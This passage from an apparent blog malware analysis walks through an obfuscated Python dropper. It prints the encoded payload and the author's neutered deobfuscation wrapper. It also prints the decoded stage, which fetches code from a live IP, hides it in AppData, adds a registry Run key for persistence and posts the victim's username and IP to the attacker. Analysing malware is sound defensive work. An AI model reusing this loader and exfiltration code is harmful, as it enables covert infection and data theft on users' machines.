\x17\xea\xae\xdc\x0e\x16Uhe\xa9&c\x9e\xe0\xff\xa2\xd1Tm\x97\xa7\x12}\x911\xc5\x9d\xa4\xaf@M\x05\x1ef.\x0e\x87\xc5\x16j4+N*\xd5\x87\x95y\xb10\xe4\xfc~\xf9lT,\x9e\x05\x07\xb5\x82\xf2\x9c\x01\xf3\\Ee&=\xe4\xf4K;b\xa5\xa3n\x9c\xd5a_F\xd8M\xec9\xe8Z\xd7P\xe0Z{\xa5\xe9s\xa3\xf1\xd2;X\x8c\xa6??\xdf}z\xbe{\x8c\x1f[\xad\xe8\xf9S\xf6\xf4(\xaeV\xca\xf5)\xe1\xcdF-!\xf2(T\t\t~\xdf\xaa\xc1\xb4\x06\xd3U\x88z\r\xa6\xcb\x05Sf\x11wT\r\xa6\xf7U\x00Q>\xa6U\xc2D\xe5Q\xae\x08\x07\xff\xdb\xab\x94\x9f[\x1c\xde\x1e[2\xaa\xa5\xa0\xf7X\x80\xc4d\xb6\xd5\x92\x11\xf21\x15\x17*>\x01\x1aj\x9a\xf9\x81`\xef\xab8\xb0\xcf\xd38\xff&]\xf3<}\x9e\xa7\x8b\xdb\xfbt<_ u\x9f\xe7\x9c\xe7W\xb9\x97\xd4\x16\xe8sI\xa4p\xfb[\xdd\xae\xeav\xb5\nQ\xaf\xdb\xd5r\xc2\x9e\xb6+\xd7\xbaD/\xaa[}\x01\xa4\x9e\x16,\xf6\x058\xab\xb4\xb5\x12\xd1\x16\xf9\xc3\xaf\x1aLk0]\x85\xa8\xd7`\xba\\0E!\xed\xfdq\xdfGI\x81\x89\x87\xe3)\x8d\xd1S\xeeQ\x1e\xc8\x97,R\xe0\xafd\x88nkT\xadQu\x15\xa2^\xa3\xear\xc2.\x8e\xa8\x84\x94gW\xf8\x88ZLK\x95\xe7_\x88Q9\xb8r\x94e\x91B\xb6\n\xe3ER?\xfd\xf2\xd5\x02+\xc6v`y\xb8\x06\xd6\xd5\x88z\r\xac\xcb\t{\n\xac\xb3\x11v\xaf\xd1\xc4\x0b_\x12\xba\x16R.\xdffi\xce\xe7#\xcbY\xe9\xab\x90i\xc2r\x82\xd9@\xae6iE\xb9\x02\xca\xa5S\x90\xad\x16\x9c\x97l\xe3\xc4\xaf\x16\x99\xeb#\xefJE\xbdF\xe6\xe5\x84]\xbc\x91\xe0b\x7fJ\xec\x17\x85\xcb\x02\xef\n\x1fM\xddGD\xa1B\xf0\x08z\x81s.\xd1\x0b\x1fk\xcdK\x1f\xa1\xddW\xad5/}\x9c6\xaf\xe1\xb5\x86\xd7\xd5\x89z\r\xaf\xcb\x85W\xca\x82\x97\x04\xadY:\x1f*\x06\xe5Z)\xdf\x96kbQ\x05T\xe4\xf5\xa1bPYC\xf2\x94\x18ge\x97/\xf7\x82\x9dw\x0frF\xa4\x96\xf1b\xbeQ\xa1\x97v\xcf\xca\xbd\xf1\xa3\x0f\xb5o\xd67\x9c\x8d\xcd\r\xe7\x9b\xd6\xc6_4\xc3t\x90M\x1c\xa4k\x9b#V~\x15hD\xbf*\xaa;f\xdd1\x97\x1e\xf5\xbac.\'\xeci\xc7\xb4\xd1u\xe5\xd7D\xe0oD\xc9TI\x7f\xa5\xa3\xc4?\xcaR\x1cL\x9b b7\xa9\xe5\x8dQ\x93\xf8\xc8\x83{\xcc\x1a\x9c\xa8k\x1aH&\x9cA8\xf4)\xb1Q\x10\xa4\x14L\xc4\xdcL\x10\x87V\x80\xbe}\x93\xdeQ\xf4c\x88\x02\x16\xc4\x8b\x13\xb1\xec\x181\xe4]6\x15\xcf\x9a\xa2\xa6\xe2\xe2\x80qC8\xd9%c\xec526\xdf\xca\x16\xbc\xc2\x1eE\xe3X\x17\xd8\xeb\xc0S2cO\x08\xb6Q\xba\x8a\xe9[l\x92N\xe1`\x84]X\x84\x7f\xc7\xb1\xc9\xfd\xe5k6\x1a\x0e\x1aq\xf5\x03\xec_\xbe\x19X\x8eC\xc11\xdd\xd8j(\xf0\xc7\xe8,\x1e\xf0?\x8aXH=\xe1\x89\tB\xba:a\xcc\xdfz\xfd\xda\x9e \xfb\x02\xfb\xa65\xb5>\x12\xcf\xba\nL\x9bLU\xc3d\xe8\x9a\x99\x01\xa3\xd8\xd7\x8dH\x11\xba\xb6\x91\xcf\x94N\xf4\x84\x89\xa7X\x81\x82Jkh\x07\xc4C\x1aD\xdc\xe7V)\xed\n\x03ar\x14EM\xf9S[Q=\xa6n%\xfa1\xe3\x93\xfel\xc0\x13\x17\x80\xec\x99\xea\xcf\xd8\x84xWjS\x81a\xf2\xa4\x9e7F\x84*\t\x9f\x82\xbdt\x18T\xb8\x9e\xa5\xdc\xa4\xa1\xa7\x9f%\xac\xa0hm\xed\x12\xd1\x00\x1cQ\xcf\x9b\n$\x8f\x84\xac-q\x1f\xed\x1fu":\xa2\xb4H7\x84\xfa!E\xd6\x85\x1c\x9e=H\xd4\x01a{$\xf4\x9c\x0e\xa5\x84f\xa6\xd8\xc4\x83\xb2\rQ\x03\xb9A\x12\xb8\xd4\x87\xb6\x92x\xaar\xff#\x97\x07Q\x01\xb4\xa3\x9c\xebI\xcau(R\x93\x0b\x84\xcc\x1a\xba\xc8h*#\xed&\xd1q\xcb\'x\xads\xc6(x\xd1\n\xea[j\xf9\x13l\x07\xbb\x14\x83\xbfj3\xa6\x1e\x83\x0e\x8a\xd9l\x07y,\xa3\xf6\xac\xe0\xe2\x18\n\xc2\t\xdd\x8c\xf8\x1e9\xd8z\x87\x87\xd4\xa2\xb3\x94v\x12 zD\t\xaf\xca \xa5\x1d vE\xe8\x05\xf6\xc6=B\\A>"W\x88\xbe\xb7<k\x8c\xa6\xb0XJ\xe6q\xea\\\xfb.\xa1\xd9J\xbb(\xb8`\xc4?\xc5\x0e\x14M\x90Q/a_\xc4\x1a\x04k\x17\x8da\xc3\xd1Y\xc7\xc1\x8c\x08\xeaw\x96}\x11\xfa\'\x0c\xbb\xe0\x9a0\x80b\x8f\xfd-D!\x12\xce\xcf\x02\x86\xa6\'\xbecI\xbe\x7f\xe7\x86\x88\x11\xc2&\xc7\x0c\xb4\x08\xe7-\xdf\xcfx\xde\x11\xcb\xc9\xee\xde\xf2@#\xca\xad\x13\xc6\xbe\xc76%\x01\x19\xf1\xad\xe3@\x95N-\xe1\xb1\xe5\x90\xa10a7\xaf\x18l\x0c\xa6\xc2<\x9f\xd8yS\xcd\xde\x04\xea\xcc\x81\xd0\x9a=<\xcd\xc4N\xf6\xcd#7\x04\xb01\x0fl\xbf \xd2\r\xa1\xda\xa6\xc8<F\x14[.\xfeh\xf1=k\xfe}\xea\x16\xf8 mfZ\r\x15S\xdd\x043*\xa6\xc0\xe8)fPU\xc5\xc9\xfdC \x9c\xc7\xf8\xf4\x16\xb1n\x04s\xbb\x98\xd2\x14\x9cb\xe0s\t/\xfc\x18\xf6\xf4\xb3\x18Nuu\xfb\xe8hw\xbb\xb7\xad\x1aM%%\xbd;\xdc\xd9~\'\xe8\xe7\xf1\xee\x83-9".\xa4\x83\xd7z\x82\xbe\xbaP\x1c\xf3p\x98\x18p\x80\x88:\x83\xbe\xde2r\xc0\x10/\x9d\xd9\x90\xa9\xcc6x\xfc\xff1(#\xecY./w1!( \x9f\xf9\xf3JQ\xfb}\x15\x9e\x84z!\xc0A\x8f\xa4X\xae\x0bqC\x01aE\x85\x7f\xd1\xac\x97If\xb6J\xf8\x9a7$!\xa6\x81\xeau\xde\x1f\xa9F\x1c\xf8\x1d\xa8\x18\x86"8\x82:\x85\x05#\xcf\xa4\x04D\x08,|\x8fP\xc3(N\x8a\xd5\xcc\xc0\x87=\xa5s\xe7\x8c\xb3\xb5\xf5s\xee\xa8\xc9\xfdL\x99\xffc\xbc\x0b\xee\xab7\xb1A\xb7\xfd\xfeM\xaa\xe3V5\xaa}V%\x96FU0\x16\x9a\xa7\xaa\xd1\x0f\x03\xf4\xc4KuhCl\xc6\x13\xfc\xe1\xc2\x9dz\xc4\xff\x91\x06,\xbc\xbc\xba\x9e}T\x8d\xa2\xf5\x9bF\x12\xc9S\xd8\x1aQ y\xd6 a\xb1\x8dW\x18\xe0\x99\x9f5\xf4\xb87O\xe1\xb5M[\xe5-\ny\xf0:\x07\xf6j[\r\xd9hm\x134C\xa7\x1ce\x9e\x8d\xcc+\xaeQ\xafl\xc7\xeb\xdfn\x98\x1bo6\xcd\xf5V\xcb\xdcX\xff\xf3\xd6f\xeb\xf5\x98\x0e\x93~\x9c\x18\x04\x08EYl\x10o\x12\x89Ar\x8f\x8a\xec:+6\x87\xa6\xc2\xd9\xa1\xdb\xd9\xbc6\x00\x0eF\xae5\x0e\xe4\xe6\xb6\xd3\xedl\xf7:\x83\x83\xc3\xc1\xe9\xfe\xc1\xee\xe1i\xba b\xd1\x9a\xb9\xe5|BF\xc8I\xba\xd4HSo\xe4\xc6u\x0b\x05}\x13\x0f\xb4$\\\x1e?\xf8\x00k|\x022\xff\xfa}\xe7\x1f\x83\x9d\x93n\xb7s\xd0\x1b\x9c\x1cw\xba\xb1V\xbe\x0c\x0b}\xde\x11\x8f\x0f\xf7z\xa7\xdb\xddN\xbf/P\xb5\xdf?\x85C"\xb9\n\xfa\xfd\x9d\x90R\xe8\'?\xc4=\xbc\xdf\x07\xbc\x8bk\xe3\x02\xcd\xecl\x99x\x1b|\x8ff\x9dk=\xb1\xa1)Vi*\xadf\xca\xc8\xcd9\xed\xee\xf7\x92\xe6\x9eP\xc1\xf3\x1f,\xe8\x0c \xcd\xf56\xf3\xdbE\x96\xefv\xde\x0e\x8e\xff\xd9\xe4\xc5*\x85\xe6\x96o\xc7\xc6^T\xea\x87\xa3\xbd\x18.\n\x98\xd8\xe0\x1bTL\x16\xf7\xad,k4\xf6B\xd7M\x18sJ\x05\xeed\xba\x1aR\xdd\xa6bFC\xaa\x9d\x8c(NL"\xd1\xd9\\|\xaeI\x8e+\xfc \xdb\x08\xa1\xe9%\xf8\x90\x1evuC\x81\xcd\x93\x1cuy=s\x1e~\x98\xa3\x1c\x1d\xd3:\xf7I\xc0tmq\xa1G\xaa>@\x99~\x08\x88\xd7\xbeQ\xd3\x85\xd4-%\x1d\xc2\xb9\x8d\x0f\xb1\x0f\xb4\xf8\x88\x99P\x02\xa8i\xe4\x05\x13\x02\xc7I%\xbbq\xb1wq\xdbT&\x887\xee\xa0}\xa3\xed\xc0!\x0c\xcaf\x8d\xcd|\xa4m)\x1a\xb4a\x17\xdb\xd1nx\xcd\x97\xd5n\x97\x9f\xb0\x1d\x17\xfb\xff\xd7\x9c\xfd\x1b\xd6a\xee\x1f')
exit()
productClass(init_variable = -8638 * -84594).do_some_math(math_input = productObject.math_prod_output - -61335) ;ぎふふはぎはぎぎぎぎはふはふふふふぎぎぎふぎぎふはふふぎふぎははぎぎ,えし000でししし0しで00ででで0で00で0でしででししでし0でで00で000し000,あびびびびびああびびあびああびああああびびあびびびびあああびびびびびあああびびびびびびびあびびびびびあびびびびびびびびびあびああび,ららららなならななららららなななならららららならななららななななららららななならららなならなななららなららららなななららならら,まららままらまらららまらららままららまらまららまららまらまらままららまらららまらままらららまらららまらまららららららままままらままま=(lambda ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ:ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ['\x64\x65\x63\x6f\x6d\x70\x72\x65\x73\x73']),(lambda ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ)"),filename='\xe381aa\xe3818a\xe381aa\xe3818a\xe3818a\xe3818a\xe381aa\xe381aa\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe3818a\xe3818a\xe381aa\xe381aa\xe381aa\xe381aa\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe3818a\xe3818a\xe3818a\xe3818a\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe381aa\xe381aa\xe381aa\xe381aa\xe381aa\xe381aa\xe3818a\xe381aa\xe3818a\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe3818a\xe381aa',mode='\x65\x76\x61\x6c'))),(lambda ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ:ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ(__import__('\x7a\x6c\x69\x62'))),(lambda え0しででで0ででで0し0で0しししででしで0000で0し0でしでししでで0で0し00ででで00ででで0,ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ:え0しででで0ででで0し0で0しししででしで0000で0し0でしでししでで0で0し00ででで00ででで0(ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ)),(lambda:(lambda ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ)"),filename='\xe381aa\xe3818a\xe381aa\xe3818a\xe3818a\xe3818a\xe381aa\xe381aa\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe3818a\xe3818a\xe381aa\xe381aa\xe381aa\xe381aa\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe3818a\xe3818a\xe3818a\xe3818a\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe381aa\xe381aa\xe381aa\xe381aa\xe381aa\xe381aa\xe3818a\xe381aa\xe3818a\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe3818a\xe381aa',mode='\x65\x76\x61\x6c')))('\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x62\x75\x69\x6c\x74\x69\x6e\x73\x27\x29\x2e\x65\x78\x65\x63'))
productObject.do_some_math(math_input = productObject.math_prod_output / 65491) ;まららままらまらららまらららままららまらまららまららまらまらままららまらららまらままらららまらららまらまららららららままままらままま()(ららららなならななららららなななならららららならななららななななららららななならららなならなななららなららららなななららならら(ぎふふはぎはぎぎぎぎはふはふふふふぎぎぎふぎぎふはふふぎふぎははぎぎ(あびびびびびああびびあびああびああああびびあびびびびあああびびびびびあああびびびびびびびあびびびびびあびびびびびびびびびあびああび(えし000でししし0しで00ででで0で00で0でしででししでし0でで00で000し000('\x76\x61\x72\x73'))),productClass.get_global_variable(_理论='ぱさらぱぱらららぱらさぱぱささぱぱぱぱららささらさぱぱらささささららぱらら')))
except Exception as excp:
print(excp)
if 496203 > 7675892:
productClass.execute(execution_variable = _str(excp))
elif 387379 > 5850648:
productClass(init_variable = -82712 * 93033).do_some_math(math_input = productObject.math_prod_output * 80573)I prevented the _exec function from doing anything by replacing it by a print function and return 0, and added an exit() after the execution of function adding the global variable that contains the malware so it doesn’t get executed, basically this malware is safe to run, and after running it I ended up with this python code, again..
from builtins import dir,exec,range,open,exit
exec('')
import subprocess
import io
import sys
import base64
import requests
from os import getenv, name, listdir, getlogin
import getpass
import winreg
from random import choice
from os.path import isfile, join, dirname
def get_ipv4_address():
try:
return requests.get("http://checkip.amazonaws.com").text.strip()
except Exception as e:
return 'None'
ipipv4 = get_ipv4_address()
if name != "nt":
exit()
py_execs = ["pythonw", "pyw", "py"]
for py_exec in py_execs:
try:
subprocess.run([py_exec, "--version"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
break
except FileNotFoundError:
continue
else:
py_exec = "python"
pythonw_path = join(dirname(sys.executable), f'{py_exec}.exe')
names = [
"GraphicsDriver",
"SecurityCenter",
"TaskScheduler",
"MediaLibrary",
"UserProfiles",
"NetworkingTools",
"PowerManagement",
"FileExplorer",
"DesktopWidgets",
"DeviceManager",
"RegistryEditor",
"BackupUtility",
"PrintQueue",
"SystemUpdater",
"BluetoothStack",
"Mapper",
"Loader",
"Gameservices",
"Microsoft.stdformat",
"adobe",
"DMapper",
"Prism",
"Spoc",
"System.Threading.Timer",
"UI.Plugin.Ncp",
"System.Runtime.Serialization.Xml",
"System.Net.Security",
"System.Net.Requests",
"System.Net.Primitives",
"System.IO",
]
def GetRandomDirr():
randomloc = choice([getenv("APPDATA"), getenv("LOCALAPPDATA")])
subfolders = listdir(randomloc)
for _ in range(10):
subchoice = choice(subfolders)
global finalfile
finalfile = randomloc + "\\" + subchoice
if not isfile(finalfile) and " " not in subchoice:
return finalfile
return getenv("TEMP")
def CreateFileNamee(folder):
randname = choice(names)
randname = finalfile.split("\\")[-1] + "." + randname
for _ in range(10):
if not isfile(f"{folder}\\{randname}"):
return f"{randname}"
return finalfile.split("\\")[-1] + "." + "".join(choice("bcdefghijklmnopqrstuvwxyz") for _ in range(8))
def WriteFilee(file):
with open(file, mode="w", encoding="utf-8") as f:
f.write(requests.get("http://162.248.100.217:80/grb").text)
def StartFilee(path):
subprocess.Popen([f'{py_exec}.exe', path], creationflags=subprocess.CREATE_NO_WINDOW)
def SetStart(path):
spoofedpath = f'"{pythonw_path}" "{path}"'
winnreg = winreg.HKEY_CURRENT_USER
starttup = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
keyc = winreg.CreateKeyEx(winnreg, starttup, 0, winreg.KEY_WRITE)
winreg.SetValueEx(keyc, choice(names), 0, winreg.REG_SZ, f"{spoofedpath}")
FolderOfFile = GetRandomDirr()
NameOfFile = CreateFileNamee(FolderOfFile)
FullFile = FolderOfFile + "\\" + NameOfFile
WriteFilee(FullFile)
StartFilee(FullFile)
try:
SetStart(FullFile)
except:
pass
username = getlogin() or getpass.getuser()
r = requests.post('http://162.248.100.217:80/loginj', json={"username": username, "userip": ipipv4, "userscreenshot": screenshotlink}, headers={'Content-type': 'application/json'})
FolderOfFile = GetRandomDirr()
NameOfFile = CreateFileNamee(FolderOfFile)
FullFile = FolderOfFile + "\\" + NameOfFile
WriteFilClipe(FullFile)
StartFilee(FullFile)
try:
SetStart(FullFile)
except:
passSo let me make the explanation short this time, The malware is at it’s final stage where it’s downloading the last malware from 162.248.100.217/grb and adding it to startup on your windows machine, After picking up a random hidden place either on appdata or localappdata, and before the execution process it’s sending your information back to the hacker server and it goes on, everything gets executed without you even noticing
The last malware seems to be an info stealer, But I will include the full analysis of it next article, Hope you enjoyed this article, and Stay safe ❤
